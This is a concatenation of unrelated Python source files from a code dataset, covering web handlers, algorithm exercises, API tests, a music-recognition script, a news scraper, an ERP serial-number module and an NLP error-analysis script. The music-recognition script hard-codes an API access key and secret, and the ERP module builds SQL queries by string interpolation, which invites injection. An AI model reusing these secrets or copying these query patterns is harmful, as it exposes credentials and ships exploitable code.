my_task_id = self.get_argument(\"my_task_id\")\n my_task = self.session.query(MyTask).filter(MyTask.id == my_task_id).first()\n self.session.delete(my_task)\n self.session.commit()\n self.redirect('/myTask')\n\n\n# 推送--定时开关机数据\nclass SendTimeSwitchHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n device_time_switch_id = self.get_argument(\"device_time_switch_id\")\n device_time_switch, week_list = BaseFunctionHandler.get_device_time_switch(self, device_time_switch_id)\n my_task = MyTask(\n name='定时开关机任务',\n type='time_switch',\n time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n user_id=self.get_secure_cookie('user_id'),\n company_id=self.get_secure_cookie('company_id'),\n )\n self.session.add(my_task)\n self.session.commit()\n for device_group in device_time_switch.device_group:\n devices = device_group.device\n for device in devices:\n my_task_content = MyTaskContent(\n device_id=device.device_id,\n from_user=self.get_secure_cookie('username'),\n new_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_data=str(week_list),\n my_task_id=my_task.id\n )\n self.session.add(my_task_content)\n self.session.commit()\n ApiDeviceSocketHandler.send_to_many_device(devices, week_list)\n self.redirect('/myTask')\n\n\n# 推送--资源组数据\nclass SendPlaylistHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n res_group_id = self.get_argument('res_group_id')\n res_group, playlist = BaseFunctionHandler.get_res_group_by_res_group_id(res_group_id)\n my_task = MyTask(\n name='播放列表任务',\n type='playlist',\n time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n user_id=self.get_secure_cookie('user_id'),\n company_id=self.get_secure_cookie('company_id'),\n )\n self.session.add(my_task)\n self.session.commit()\n device_groups = res_group.deviceGroup\n for device_group in device_groups:\n devices = device_group.device\n for device in devices:\n my_task_content = MyTaskContent(\n device_id=device.device_id,\n from_user=self.get_secure_cookie('username'),\n new_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_data=str(playlist),\n my_task_id=my_task.id\n )\n self.session.add(my_task_content)\n self.session.commit()\n ApiDeviceSocketHandler.send_to_many_device(devices, playlist)\n self.redirect('/myTask')\n\n\n# 推送--设备重启命令\nclass SendDeviceRestartHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n device_id = self.get_argument('device_id')\n my_task = MyTask(\n name='广告机重启',\n type='deviceRestart',\n time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n user_id=self.get_secure_cookie('user_id'),\n company_id=self.get_secure_cookie('company_id'),\n )\n self.session.add(my_task)\n self.session.commit()\n data = [{'cmd': 'deviceRestart'}, {'data': 'restart'}]\n my_task_content = MyTaskContent(\n device_id=device_id,\n from_user=self.get_secure_cookie('username'),\n new_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_data=str(data),\n my_task_id=my_task.id\n )\n self.session.add(my_task_content)\n self.session.commit()\n ApiDeviceSocketHandler.send_to_one_device(device_id, data)\n self.redirect('/myTask')\n\n\n","repo_name":"xin1195/bcloud","sub_path":"handlers/myTask.py","file_name":"myTask.py","file_ext":"py","file_size_in_byte":5213,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"83"} +{"seq_id":"17479915409","text":"\n# def TwoSum(nums:list,target):\n# nums.sort()\n# begin = 0\n# end = len(nums) - 
1\n#     while begin < end:\n#         sum = nums[begin] + nums[end]\n#         if sum == target:\n#             print(begin,end)\n#             begin += 1\n#             end -= 1\n#         else:\n#             if sum < target:\n#                 begin += 1\n#             else:\n#                 end -= 1  # sum too large: move the right pointer inward\n\n\n# def TwoSum(nums,target):\n#     for i in range(len(nums)):\n#         for j in range(i + 1,len(nums)):\n#             if nums[i] + nums[j] == target:\n#                 return i,j\n\ndef TwoSum(nums:list,target):\n    d = {}\n    for i in range(len(nums)):\n        temp = target - nums[i]\n        if temp in d:\n            return d[temp],i\n        d[nums[i]] = i\n\nnums = [1,4,3,5,2]\nprint(TwoSum(nums,6))","repo_name":"qixiaoxioa/data_structure","sub_path":"两数之和.py","file_name":"两数之和.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73661301710","text":"#! /usr/bin/env python3\n\n# standard library\nimport datetime\nimport os\n\n# testing libraries\nimport pytest\nfrom falcon import testing\nimport falcon\n\n# internal import\nimport backend.app\n\n# folder with json files for test\nCTA_TEST_DIR = 'tests/func/cta-fake-response-json/'\n\n\n@pytest.fixture()\ndef client():\n    \"\"\"Create instance of Falcon testing client\n    \"\"\"\n    api = backend.app.create_app()\n    return testing.TestClient(api)\n\n\nCTA_SUCCESS_JSON_RESP = (\n    os.path.join(CTA_TEST_DIR, 'cta_success_fake_response.json')\n)\n\n\ndef test_get_successful_response(client, mocker, json_loader):\n    # Arrange\n    mock_datetime = mocker.patch.object(backend.cta, 'datetime')\n    mock_datetime.datetime.now.return_value = (\n        datetime.datetime(2017, 11, 14, 15, 56)\n    )\n\n    get_mock = mocker.MagicMock()\n    get_mock.json.return_value = json_loader(\n        CTA_SUCCESS_JSON_RESP\n    )\n    get_mock.status_code = 200\n    request_mock = mocker.patch.object(\n        backend.cta.requests,\n        'get',\n        return_value=get_mock,\n    )\n\n    # Act\n    response = client.simulate_get('/stops/1066')\n\n    # Assert\n    upcoming_buses = response.json['result']\n    assert response.status == falcon.HTTP_200\n    assert len(upcoming_buses) == 4\n    assert upcoming_buses[0] == {'bus': '146', 'min_away': 3}\n    assert upcoming_buses[1] == {'bus': '151', 'min_away': 10}\n\n    args, kwargs = request_mock.call_args\n    params = kwargs['params'].items()\n    assert request_mock.call_count == 1\n    assert ('stpid', '1066') in params\n    assert ('format', 'json') in params\n\n\ndef test_404(client, mocker):\n    # Arrange\n    get_mock = mocker.MagicMock()\n    get_mock.status_code = 404\n    mocker.patch.object(\n        backend.cta.requests,\n        'get',\n        return_value=get_mock,\n    )\n\n    # Act\n    response = client.simulate_get('/stops/1066')\n\n    # Assert\n    assert response.status == falcon.HTTP_200\n    assert response.json == {'error': 'Request returned 404'}\n\n\ndef test_url_not_found(client, mocker):\n    # Arrange\n    mocker.patch.object(\n        backend.cta.requests,\n        'get',\n        side_effect=[ConnectionError]\n    )\n\n    # Act\n    response = client.simulate_get('/stops/1066')\n\n    # Assert\n    assert response.status == falcon.HTTP_200\n    assert response.json == {'error': 'URL not found'}\n\n\nCTA_ERROR_INCORRECT_STOP_JSON_RESP = (\n    os.path.join(CTA_TEST_DIR, 'cta_error_incorrect_stop_response.json')\n)\n\n\ndef test_wrong_stop(client, mocker, json_loader):\n    # Arrange\n    get_mock = mocker.MagicMock()\n    get_mock.status_code = 200\n    get_mock.json.return_value = json_loader(\n        CTA_ERROR_INCORRECT_STOP_JSON_RESP\n    )\n    mocker.patch.object(\n        backend.cta.requests,\n        'get',\n        return_value=get_mock,\n    )\n\n    # Act\n    response = client.simulate_get('/stops/106')\n\n    # Assert\n    assert response.status == falcon.HTTP_200\n    assert response.json == {'error': 
'stop_id: 106 does not exist'}\n\n\nCTA_ERROR_UNSUPPORTED_FUNC_JSON_RESP = (\n os.path.join(CTA_TEST_DIR, 'cta_error_unsupported_function_response.json')\n)\n\n\ndef test_unsupported_function(client, mocker, json_loader):\n # Arrange\n get_mock = mocker.MagicMock()\n get_mock.status_code = 200\n get_mock.json.return_value = json_loader(\n CTA_ERROR_UNSUPPORTED_FUNC_JSON_RESP\n )\n mocker.patch.object(\n backend.cta.requests,\n 'get',\n return_value=get_mock,\n )\n\n # Act\n response = client.simulate_get('/stops/1066')\n\n # Assert\n assert response.status == falcon.HTTP_200\n assert response.json == {\n 'error': \"Unknown error: {'msg': 'Unsupported function'}\"\n }\n\n\nCTA_ERROR_UNKNOWN_TYPE_JSON_RESP = (\n os.path.join(CTA_TEST_DIR, 'cta_error_unknown_type_response.json')\n)\n\n\ndef test_unknown_response_type(client, mocker, json_loader):\n # Arrange\n get_mock = mocker.MagicMock()\n get_mock.status_code = 200\n get_mock.json.return_value = json_loader(\n CTA_ERROR_UNKNOWN_TYPE_JSON_RESP\n )\n mocker.patch.object(\n backend.cta.requests,\n 'get',\n return_value=get_mock,\n )\n\n # Act\n response = client.simulate_get('/stops/1066')\n\n # Assert\n assert response.status == falcon.HTTP_200\n assert response.json == {\n 'error': \"Unexpected response type: {'foo': [{'msg': 'Unknown error'}]}\"\n }\n\n\ndef test_not_implemented(client):\n response = client.simulate_post('/stops/1066')\n assert response.status == falcon.HTTP_METHOD_NOT_ALLOWED\n\n response = client.simulate_put('/stops/1066')\n assert response.status == falcon.HTTP_METHOD_NOT_ALLOWED\n\n response = client.simulate_patch('/stops/1066')\n assert response.status == falcon.HTTP_METHOD_NOT_ALLOWED\n\n response = client.simulate_delete('/stops/1066')\n assert response.status == falcon.HTTP_METHOD_NOT_ALLOWED\n","repo_name":"alysivji/sivmetrics-backend","sub_path":"tests/func/cta_test.py","file_name":"cta_test.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"21986784447","text":"from collections import deque\ndef solution(maps):\n n = len(maps)\n res = 0\n dx, dy = [-1, 1, 0, 0], [0, 0, -1, 1]\n def bfs(x, y):\n d = deque()\n d.append((x, y))\n \n while d:\n x, y = d.popleft()\n for i in range(4):\n nx, ny = x+dx[i], y+dy[i]\n if nx < 0 or nx >= n or ny < 0 or ny >= len(maps[0]): continue \n if maps[nx][ny] == 0: continue\n if maps[nx][ny] == 1:\n maps[nx][ny] = maps[x][y] + 1\n d.append((nx, ny))\n return maps[n-1][len(maps[0])-1]\n res = bfs(0, 0)\n return -1 if res == 1 else res","repo_name":"JiSuMun/Algorithm","sub_path":"프로그래머스/lv2/1844. 게임 맵 최단거리/게임 맵 최단거리.py","file_name":"게임 맵 최단거리.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34519585996","text":"\"\"\"\n@author: Julian Gómez\n@description: Programa que explica el tipo de dato \"rangos\"\n\"\"\"\n\ndef run():\n #Generar rango que imprima numeros impares\n rango_impares = range(0,100,2)\n for i in rango_impares:\n print(f\"N° impar: {i+1}\\t\",end=\"\")\n\nif __name__ == \"__main__\":\n run()","repo_name":"JulianG91012/Platzi-Python-Cursos","sub_path":"PensamientoComputacional/rangos.py","file_name":"rangos.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37482854858","text":"#sudo pip install vk\nimport vk\n# c этим сложнее. 
https://github.com/acrcloud/acrcloud_sdk_python\n# там есть инструкция, только файл setup.py пуст, поэтому нужно в него скопировать содержимое\n# файлика //python2.7/setup.py\nfrom acrcloud.recognizer import ACRCloudRecognizer\n\n# конфиг стандартный, я зарегистрировал аккаунт на acrcloud.com\n\n# интсрукция по заведению нового инстанса есть в мануале на гитхабе, но кажется, нам и с такими ключами хватит\n\nconfig = {\n # Replace \"xxxxxxxx\" below with your project's host, access_key and access_secret.\n 'host': 'eu-west-1.api.acrcloud.com',\n 'access_key': '4aca6d089717c23585f43b957870c8c3',\n 'access_secret': '2WM52yeRg7TaizVhlk7RkdA0FVqgp4iVOupE1CM4',\n 'timeout': 10 # seconds\n}\n\nmusic_file_path = '/Users/akupriyanov/Desktop/icon_hack/englishman.mp3'\n\ndef get_responce(config, music_file_path, start_seconds=3):\n recognizer = ACRCloudRecognizer(config)\n # responce = recognizer.recognize_by_file(file_path='/Users/akupriyanov/Desktop/icon_hack/Oxxxymiron.mp3', start_seconds=3)\n responce = recognizer.recognize_by_file(file_path=music_file_path, start_seconds=start_seconds)\n return responce\n\n\ndef parce_responce(response):\n #print(response)\n split_responce = response.split(':')\n arr_responce = []\n for i, element_responce in enumerate(split_responce):\n arr_responce += element_responce.split(',')\n\n #print(arr_responce)\n is_find = True\n\n for i, element_responce in enumerate(arr_responce):\n if 'msg' in element_responce:\n if 'Success' in arr_responce[i + 1]:\n print(\"Я нашел и начинаю парсинг!\")\n break\n else:\n print(\"Я не нашел:(\")\n is_find = False\n break\n\n title, artist = None, None\n\n if is_find:\n for i, element_responce in enumerate(arr_responce):\n if 'title' in element_responce:\n title = arr_responce[i + 1]\n title = ''.join(\n list(\n filter(\n lambda ch: ch not in \"?.!/;:\\\\\\\"'{[]}\", title)\n )\n )\n if 'artists' in element_responce and 'name' in arr_responce[i + 1]:\n artist = arr_responce[i + 2]\n artist = ''.join(\n list(\n filter(\n lambda ch: ch not in \"?.!/;:\\\\\\\"'{[]}\", artist)\n )\n )\n\n return (title, artist)","repo_name":"HackFactory/IconHack","sub_path":"acrcloud_api.py","file_name":"acrcloud_api.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17266897001","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\nfrom googleapiclient.discovery import build\nfrom google.oauth2.service_account import Credentials\nimport gspread\nimport json\nfrom datetime import datetime\nimport time\n\n# -----------------------------라인 Notify---------------------------------------#\n# lineNotify 라인 Notify에 보낼 형태로 만들어서 전송\ndef lineNotify(message):\n # 라인 Nofify 토큰 조회\n lineNotifyHeaders = {\n \"Authorization\": \"Bearer \" + os.getenv(\"TOKEN_LINE_NOTIFY\")\n }\n lineNotifyDatas = {\n \"message\" : message\n }\n requests.post(url=\"https://notify-api.line.me/api/notify\", headers=lineNotifyHeaders, data=lineNotifyDatas)\n\n# -----------------------------구글 스프레드 시트---------------------------------------#\nSPREADSHEET_ID = os.getenv(\"TOKEN_GOOGLE_SHEET\", \"\")\nGOOGLE_APPLICATION_CREDENTIALS=os.getenv(\"GOOGLE_APPLICATION_CREDENTIALS\", \"\")\n\n# InitHeader 시트의 헤더 세팅\ndef InitHeader(worksheet):\n print(\"InitHeader\")\n worksheet.batch_update([{\n 'range': 'A1:D1',\n 'values': [\n [\"검색어\", \"제목\", \"url\", \"날짜\"]\n ]\n }])\n\n# checkDuplicate 중복검사 후 기존 데이터 앞에 삽입\ndef checkDuplicate(prev, now):\n # 중복검사 후 기존 데이터 앞에 삽입\n if len(prev) 
> 0:\n for data in now:\n # url이 같은지 확인\n isDuplicate = 0\n for value in prev:\n if value[2] == data[2]:\n isDuplicate = 1\n break\n if isDuplicate == 0:\n prev.insert(0, data)\n else :\n prev = now\n return prev\n\n# 1. 시트가 있는지 확인\n# 1-1. 시트가 없다면 생성\n# 2. 시트의 내용을 확인\n# 2-2. 중복 뉴스 확인\n# 3. 새로운 뉴스 데이터를 추가\n# 시트 확인해서 추가하는 작업 수행\ndef GoogleSpreadSheet(keyword, dataFrame):\n # sheet\n # gc = gspread.service_account(GOOGLE_APPLICATION_CREDENTIALS)\n gc = gspread.service_account_from_dict(json.loads(GOOGLE_APPLICATION_CREDENTIALS))\n sht = gc.open_by_key(SPREADSHEET_ID)\n try:\n # 작업할 시트 조회\n worksheet = sht.worksheet(keyword)\n except:\n # 시트가 없으면 생성\n print(\"Craete Sheet \" + keyword)\n worksheet = sht.add_worksheet(title=keyword, rows=\"100\", cols=\"20\")\n InitHeader(worksheet)\n values = worksheet.get_all_values()\n # 시트의 데이터와 중복이 있는지 검사\n dataFrameUnique = checkDuplicate(values[1:999], dataFrame)\n # 삽입할게 1개 이상인 경우\n if len(dataFrameUnique) - len(values[1:999]) > 0:\n # 최대 1000개까지로 기사 개수 제한\n dataFrameUnique = dataFrameUnique[0:999]\n worksheet.batch_update([{\n 'range': 'A2:D1000',\n 'values': dataFrameUnique,\n }])\n # 신규 기사 발생시 라인 노티\n # lineNotify(\"[\" + keyword + \"]\\n\" + dataFrame[0][1] + \"\\n\" + dataFrame[0][2])\n\n# worker\ndef worker(keywords, sortType, count):\n today = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n # 입력한 키워드 만큼 반복\n for keyword in keywords:\n # 네이버에 검색\n r = requests.get(f'https://search.naver.com/search.naver?where=news&query={keyword}&sort={sortType}')\n soup = BeautifulSoup(r.text, 'html.parser')\n # 기사 목록을 원하는 기사 수 만큼 조회\n articles = soup.select('ul.list_news > li')\n _count = count\n dataFrame = []\n for index, article in enumerate(articles):\n if _count > 0:\n if articles[index].select_one('a.news_tit') is not None:\n # 각 요소를 선택\n title = articles[index].select_one('a.news_tit')['title']\n url = articles[index].select_one('a.news_tit')['href']\n dataFrame.append([keyword, title, url, today])\n # 원하는 개수 만큼 기사를 가져왔는지 확인\n _count = _count - 1\n # 구글 스프레드 시트에 최신 뉴스 추가\n GoogleSpreadSheet(keyword, dataFrame)\n\n\n# -----------------------------검색 설정---------------------------------------#\n\n# 검색 단어들 \",\"로 구분된 문자열로 지정\nkeywords = os.getenv(\"KEYWORDS\", \"IBM,AWS,IDG\").split(',')\n# 검색 우선 순위 설정\n# relation 0\n# leatest 1\n# older 2\nsortType = os.getenv(\"SORT_TYPE\", 0)\n# 검색당 가져올 기사 수 (최대 10개)\ncount = int(os.getenv(\"COUNT\", 10))\n\n# worker for googlesheet\nworker(keywords, sortType, count)\n","repo_name":"hojin-kr/newsParserAndLineNotify","sub_path":"naver.py","file_name":"naver.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32033423270","text":"from __future__ import unicode_literals\nimport webnotes\n\nfrom webnotes.utils import cint, getdate, nowdate\nimport datetime\nfrom webnotes import msgprint, _\n\t\nfrom controllers.stock_controller import StockController\n\nclass DocType(StockController):\n\tdef __init__(self, doc, doclist=[]):\n\t\tself.doc = doc\n\t\tself.doclist = doclist\n\n\tdef validate_amc_status(self):\n\t\t\"\"\"\n\t\t\tvalidate amc status\n\t\t\"\"\"\n\t\tif (self.doc.maintenance_status == 'Out of AMC' and self.doc.amc_expiry_date and getdate(self.doc.amc_expiry_date) >= datetime.date.today()) or (self.doc.maintenance_status == 'Under AMC' and (not self.doc.amc_expiry_date or getdate(self.doc.amc_expiry_date) < datetime.date.today())):\n\t\t\tmsgprint(\"AMC expiry date and maintenance status mismatch. 
Please verify\", raise_exception=1)\n\n\tdef validate_warranty_status(self):\n\t\t\"\"\"\n\t\t\tvalidate warranty status\t\n\t\t\"\"\"\n\t\tif (self.doc.maintenance_status == 'Out of Warranty' and self.doc.warranty_expiry_date and getdate(self.doc.warranty_expiry_date) >= datetime.date.today()) or (self.doc.maintenance_status == 'Under Warranty' and (not self.doc.warranty_expiry_date or getdate(self.doc.warranty_expiry_date) < datetime.date.today())):\n\t\t\tmsgprint(\"Warranty expiry date and maintenance status mismatch. Please verify\", raise_exception=1)\n\n\n\tdef validate_warehouse(self):\n\t\tif self.doc.status=='In Store' and not self.doc.warehouse:\n\t\t\tmsgprint(\"Warehouse is mandatory if this Serial No is In Store\", raise_exception=1)\n\n\tdef validate_item(self):\n\t\t\"\"\"\n\t\t\tValidate whether serial no is required for this item\n\t\t\"\"\"\n\t\titem = webnotes.conn.sql(\"select name, has_serial_no from tabItem where name = '%s'\" % self.doc.item_code)\n\t\tif not item:\n\t\t\tmsgprint(\"Item is not exists in the system\", raise_exception=1)\n\t\telif item[0][1] == 'No':\n\t\t\tmsgprint(\"To proceed please select 'Yes' in 'Has Serial No' in Item master: '%s'\" % self.doc.item_code, raise_exception=1)\n\t\t\t\n\n\tdef validate(self):\n\t\tself.validate_warranty_status()\n\t\tself.validate_amc_status()\n\t\tself.validate_warehouse()\n\t\tself.validate_item()\n\n\tdef on_update(self):\n\t\tif self.doc.warehouse and self.doc.status == 'In Store' \\\n\t\t\t\tand cint(self.doc.sle_exists) == 0 and \\\n\t\t\t\tnot webnotes.conn.sql(\"\"\"select name from `tabStock Ledger Entry` \n\t\t\t\twhere serial_no = %s and ifnull(is_cancelled, 'No') = 'No'\"\"\", self.doc.name):\n\t\t\tself.make_stock_ledger_entry(1)\n\t\t\twebnotes.conn.set(self.doc, 'sle_exists', 1)\n\t\t\t\n\t\t\tself.make_gl_entries()\n\n\tdef make_stock_ledger_entry(self, qty):\n\t\tfrom webnotes.model.code import get_obj\n\t\tvalues = [{\n\t\t\t'item_code'\t\t\t\t: self.doc.item_code,\n\t\t\t'warehouse'\t\t\t\t: self.doc.warehouse,\n\t\t\t'posting_date'\t\t\t: self.doc.purchase_date or (self.doc.creation and self.doc.creation.split(' ')[0]) or nowdate(),\n\t\t\t'posting_time'\t\t\t: self.doc.purchase_time or '00:00',\n\t\t\t'voucher_type'\t\t\t: 'Serial No',\n\t\t\t'voucher_no'\t\t\t: self.doc.name,\n\t\t\t'voucher_detail_no'\t \t: '', \n\t\t\t'actual_qty'\t\t\t: qty, \n\t\t\t'stock_uom'\t\t\t\t: webnotes.conn.get_value('Item', self.doc.item_code, 'stock_uom'),\n\t\t\t'incoming_rate'\t\t\t: self.doc.purchase_rate,\n\t\t\t'company'\t\t\t\t: self.doc.company,\n\t\t\t'fiscal_year'\t\t\t: self.doc.fiscal_year,\n\t\t\t'is_cancelled'\t\t\t: 'No', # is_cancelled is always 'No' because while deleted it can not find creation entry if it not created directly, voucher no != serial no\n\t\t\t'batch_no'\t\t\t\t: '',\n\t\t\t'serial_no'\t\t\t\t: self.doc.name\n\t\t}]\n\t\tget_obj('Stock Ledger').update_stock(values)\n\n\n\tdef on_trash(self):\n\t\tif self.doc.status == 'Delivered':\n\t\t\tmsgprint(\"Cannot trash Serial No : %s as it is already Delivered\" % (self.doc.name), raise_exception = 1)\n\t\telif self.doc.status == 'In Store': \n\t\t\twebnotes.conn.set(self.doc, 'status', 'Not in Use')\n\t\t\tself.make_stock_ledger_entry(-1)\n\t\t\t\n\t\t\tif cint(webnotes.defaults.get_global_default(\"auto_inventory_accounting\")) \\\n\t\t\t\tand webnotes.conn.sql(\"\"\"select name from `tabGL Entry`\n\t\t\t\twhere voucher_type=%s and voucher_no=%s and ifnull(is_cancelled, 'No')='No'\"\"\",\n\t\t\t\t(self.doc.doctype, 
self.doc.name)):\n\t\t\t\t\tself.make_gl_entries(cancel=True)\n\n\n\tdef on_cancel(self):\n\t\tself.on_trash()\n\n\tdef on_restore(self):\n\t\tself.make_stock_ledger_entry(1)\n\t\tself.make_gl_entries()\n\t\n\tdef on_rename(self, new, old, merge=False):\n\t\t\"\"\"rename serial_no text fields\"\"\"\n\t\tif merge:\n\t\t\tmsgprint(_(\"Sorry. Serial Nos. cannot be merged\"), raise_exception=True)\n\t\t\n\t\tfor dt in webnotes.conn.sql(\"\"\"select parent from tabDocField \n\t\t\twhere fieldname='serial_no' and fieldtype='Text'\"\"\"):\n\t\t\t\n\t\t\tfor item in webnotes.conn.sql(\"\"\"select name, serial_no from `tab%s` \n\t\t\t\twhere serial_no like '%%%s%%'\"\"\" % (dt[0], old)):\n\t\t\t\t\n\t\t\t\tserial_nos = map(lambda i: i==old and new or i, item[1].split('\\n'))\n\t\t\t\twebnotes.conn.sql(\"\"\"update `tab%s` set serial_no = %s \n\t\t\t\t\twhere name=%s\"\"\" % (dt[0], '%s', '%s'),\n\t\t\t\t\t('\\n'.join(serial_nos), item[0]))\n\n\tdef make_gl_entries(self, cancel=False):\n\t\tif not cint(webnotes.defaults.get_global_default(\"auto_inventory_accounting\")):\n\t\t\treturn\n\t\t\t\t\n\t\tfrom accounts.general_ledger import make_gl_entries\n\t\tagainst_stock_account = self.get_company_default(\"stock_adjustment_account\")\n\t\tgl_entries = self.get_gl_entries_for_stock(against_stock_account, self.doc.purchase_rate)\n\t\t\n\t\tfor entry in gl_entries:\n\t\t\tentry[\"posting_date\"] = self.doc.purchase_date or (self.doc.creation and \n\t\t\t\tself.doc.creation.split(' ')[0]) or nowdate()\n\t\t\t\n\t\tif gl_entries:\n\t\t\tmake_gl_entries(gl_entries, cancel)","repo_name":"rohitw1991/adberp","sub_path":"stock/doctype/serial_no/serial_no.py","file_name":"serial_no.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41242154233","text":"\n\"\"\"\nChanges 29/10\n- Added successfull instances\n\n4/11\n- Look for specific verb/Fehler anhand der Verben quantifizieren\n\"\"\"\n\n\n\nimport pandas\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, precision_recall_fscore_support, confusion_matrix, ConfusionMatrixDisplay\nfrom sklearn.metrics import plot_confusion_matrix\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport sys\nimport csv\n\n\ndef get_by_indices(sig, key, indices, prediction, gold_label, data):\n \"\"\"\n Write the missclassified instances out by key and line!\n :param indices:\n :param prediction:\n :param gold_label:\n :param data:\n :return:\n \"\"\"\n with open(\"fine_grained_analysis_\" + key + \".csv\", \"a\", newline='', encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n for i in range(len(prediction)):\n if prediction[i] != gold_label[i]:\n idx = indices[i]\n #print(indices[i])\n if key == \"positive\":\n output_string = [data[idx][0], sig, data[idx][3], data[idx][5],str(prediction[i]), str(gold_label[i])]\n writer.writerow(output_string)\n #print(data[idx][0], data[idx][3], data[idx][5], data[idx][-1])\n else:\n output_string = [data[idx][0], sig, data[idx][3], data[idx][4],str(prediction[i]), str(gold_label[i])]\n writer.writerow(output_string)\n\n\ndef return_indices(content, count, signature):\n index = []\n for num, line in enumerate(content[1:]):\n data_sig = line[14]\n if data_sig == signature:\n index.append(line[0])\n print(len(index))\n assert len(index) == count\n return index\n\n\ndef indepth_results_failed(y_true, y_pred, signature_indices):\n \"\"\"\n Compare the predictions to gold labels. 
Find the instances which are false (or match).\n :param y_true:\n :param y_pred:\n :param signature_indices: contains the indices of the specified signature\n :return:\n \"\"\"\n print(signature_indices)\n y_true_labels = y_true[\"label\"].iloc[signature_indices].values.tolist()\n y_pred_labels = y_pred[\"label\"].iloc[signature_indices].values.tolist()\n #print(\"Gold: \", y_true_labels)\n #print(\"Preds: \", y_pred_labels)\n # Find the indices of errors\n indices_diff = [i for i in range(len(y_pred_labels)) if y_pred_labels[i] != y_true_labels[i]]\n #print(indices_diff)\n values_indices = [signature_indices[i] for i in indices_diff]\n #print(values_indices)\n failed_instances = y_true.iloc[values_indices].values.tolist()\n #print(*failed_instances, sep=\"\\n\")\n indices_diff = set(indices_diff)\n #print(\"Len preds: \", len(y_pred_labels))\n #print(\"Len indices diff: \", len(indices_diff))\n return failed_instances, y_pred_labels, indices_diff\n\n\ndef indepth_results_succed(y_true, y_pred, signature_indices):\n \"\"\"\n Compare the predictions to gold labels. Find the instances which are false (or match).\n :param y_true:\n :param y_pred:\n :param signature_indices:\n :return:\n \"\"\"\n print(signature_indices)\n y_true_labels = y_true[\"label\"].iloc[signature_indices].values.tolist()\n y_pred_labels = y_pred[\"label\"].iloc[signature_indices].values.tolist()\n #print(\"Gold: \", y_true_labels)\n #print(\"Preds: \", y_pred_labels)\n # Find the indices of errors\n indices_equal = [i for i in range(len(y_pred_labels)) if y_pred_labels[i] == y_true_labels[i]]\n #print(indices_diff)\n values_indices = [signature_indices[i] for i in indices_equal]\n #print(values_indices)\n failed_instances = y_true.iloc[values_indices].values.tolist()\n #print(*failed_instances, sep=\"\\n\")\n indices_diff = set(indices_equal)\n return failed_instances, y_pred_labels, indices_equal\n\n# 1197\ndef print_errors_and_predictions(model_type, false_instances, predictions, indices):\n for i,j in zip(false_instances, indices):\n print(\"{}: {} {}\".format(model_type, i, predictions[j]))\n\n\nif __name__ == \"__main__\":\n platform = \"local\"\n paths = {\"local\": \"../data/verb_veridicality_evaluation.tsv\", \"cl\": \"/home/students/meier/MA/verb_veridicality/verb_veridicality_evaluation.tsv\" }\n f = paths[platform]\n #results = sys.argv[1]\n #key_pos_or_neg = sys.argv[2]\n #outputfile = sys.argv[3]\n\n content = []\n with open(f, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n content.append(line.split(\"\\t\"))\n\n plus_plus = return_indices(content, 212, signature=\"+/+\\n\")\n plus_minus = return_indices(content, 100, signature=\"+/-\\n\")\n minus_plus = return_indices(content, 25, signature=\"-/+\\n\")\n neutral_plus = return_indices(content, 63, signature=\"o/+\\n\")\n neutral_minus = return_indices(content, 28, signature=\"o/-\\n\")\n minus_neutral = return_indices(content, 55, signature=\"-/o\\n\")\n plus_neutral = return_indices(content, 80, signature=\"+/o\\n\")\n neutral_neutral = return_indices(content, 935, signature=\"o/o\\n\") #935\n\n indices_dict = {\"plus_plus\": plus_plus, \"plus_minus\": plus_minus, \"minus_plus\": minus_plus, \"neutral_plus\": neutral_plus,\n \"neutral_minus\": neutral_minus, \"minus_neutral\": minus_neutral, \"plus_neutral\": plus_neutral,\n \"neutral_neutral\": neutral_neutral}\n\n indices_key = \"neutral_plus\"\n positive = \"../preprocess/verb_verid_nor.csv\"\n negative = \"../preprocess/verb_verid_neg.csv\"\n key_pos_or_neg = \"pos\"\n pos_or_neg = {\"pos\": 
